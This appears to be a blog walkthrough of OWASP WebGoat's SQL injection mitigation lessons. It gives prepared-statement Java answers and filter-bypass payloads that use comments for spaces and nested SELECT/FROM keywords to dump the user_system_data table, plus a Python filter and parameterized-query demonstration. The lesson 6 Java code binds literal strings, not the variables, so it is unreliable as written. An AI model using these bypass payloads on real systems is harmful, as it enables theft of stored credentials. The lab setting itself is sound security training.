WebGoat SQL injection mitigation lessons 5 6 9 10

PVXs
3 min read · Sep 10, 2020

A few quick lessons

WebGoat SQL injection mitigation lesson 5

Everything you need to solve this lesson is covered in mitigation lessons 1 to 4. These are the answers for the text fields, in order from top to bottom and from left to right:

getConnection
PreparedStatement statement
prepareStatement
?
?
statement.setString(1, name)
statement.setString(2, mail)

WebGoat SQL injection mitigation lesson 6

As for lesson 5, all you need to know is in the previous lessons. Here is my code for the solution.

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;

try {
    Connection conn = DriverManager.getConnection(DBURL, DBUSER, DBPW);
    // The two '?' placeholders are bound as data, so input can never change the query structure.
    PreparedStatement statement = conn.prepareStatement("SELECT status FROM users WHERE name=? AND mail=?");
    statement.setString(1, "name");
    statement.setString(2, "mail");
    // executeQuery() is the correct call for a SELECT; executeUpdate() is for INSERT/UPDATE/DELETE.
    ResultSet rs = statement.executeQuery();
} catch (Exception e) {
    System.out.println("Oops. Something went wrong!");
}

WebGoat SQL injection mitigation lesson 9

This is a clone of WebGoat SQL injection advanced 3. A few quick tests show that the validation on the text field checks for spaces and does not permit them as input.

We can try to substitute spaces with comments.

/**/ <-- This is a comment in HSQLDB

Let's try -> a'/**/or/**/'1'='1';--

From here, we can build the query we need to run to get all the rows of the ‘user_system_data’ table.

a';/**/select/**/*/**/from/**/user_system_data;--

a'/**/union/**/select/**/user_system_data.*,'1','1',1/**/from/**/user_system_data;--

WebGoat SQL injection mitigation lesson 10

Trying the solution queries from lesson 9, we can see that the form's validation checks for white space and for the ‘SELECT’ and ‘FROM’ keywords.

But if we nest a SELECT inside a SELECT by typing SELSELECTECT, we can see that the validation removes the inner SELECT and leaves the outer SELECT untouched: the filter strips each keyword once and does not re-check its own output recursively.

/**/ <-- HSQLDB comment instead of white space
selselectect <-- instead of 'select'
frfromom <-- instead of 'from'

So my solution for lesson 10 is:

a';/**/seselectlect/**/*/**/frfromom/**/user_system_data;--
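To show why the lesson 10 filter fails and why the prepared statements from lessons 5 and 6 are the real fix, here is an added Python example (not WebGoat's own Java code). It models the single-pass keyword filter described above, a fixed-point variant that keeps re-applying it, and a parameterized lookup against a constructed in-memory SQLite table standing in for user_system_data; the column names and sample rows are assumptions.

```python
import re
import sqlite3

# Constructed sample rows standing in for WebGoat's user_system_data table (assumption).
SAMPLE_ROWS = [("jsmith", "secret1"), ("dave", "passw0rd")]

# The lesson 10 payload from the page, reused here as the test input.
LESSON10_PAYLOAD = "a';/**/seselectlect/**/*/**/frfromom/**/user_system_data;--"


def single_pass_filter(user_input: str) -> str:
    """Blocklist filter modelled on the page's description of lesson 10:
    drops white space and removes each SELECT/FROM keyword in one pass only."""
    cleaned = re.sub(r"\s", "", user_input)
    for keyword in ("select", "from"):
        cleaned = re.sub(keyword, "", cleaned, flags=re.IGNORECASE)
    return cleaned


def fixed_point_filter(user_input: str) -> str:
    """Re-applies the single-pass filter until nothing changes, so nested
    keywords such as 'seselectlect' cannot survive. Still a blocklist, so it
    only narrows the bypass space; it does not make concatenation safe."""
    previous, cleaned = None, user_input
    while cleaned != previous:
        previous, cleaned = cleaned, single_pass_filter(cleaned)
    return cleaned


def contains_keyword(text: str) -> bool:
    """Detection check: does the filtered text still carry a SQL keyword?"""
    return re.search(r"select|from", text, flags=re.IGNORECASE) is not None


def make_db() -> sqlite3.Connection:
    """Builds the constructed in-memory table the lookup runs against."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_system_data (user_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO user_system_data VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_user(conn: sqlite3.Connection, name: str) -> list:
    """Parameterized lookup: the whole input is bound as a value, so the
    payload above is compared against user_name and simply matches nothing."""
    cur = conn.execute(
        "SELECT user_name, password FROM user_system_data WHERE user_name = ?", (name,)
    )
    return cur.fetchall()
```

The single-pass filter turns the payload into a string that still spells SELECT and FROM, while the parameterized lookup returns no rows for it regardless of any filtering.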

This concludes WebGoat SQL injection mitigation 5 6 9 10.

I hope you liked it.

PVXs — https://twitter.com/pivixih
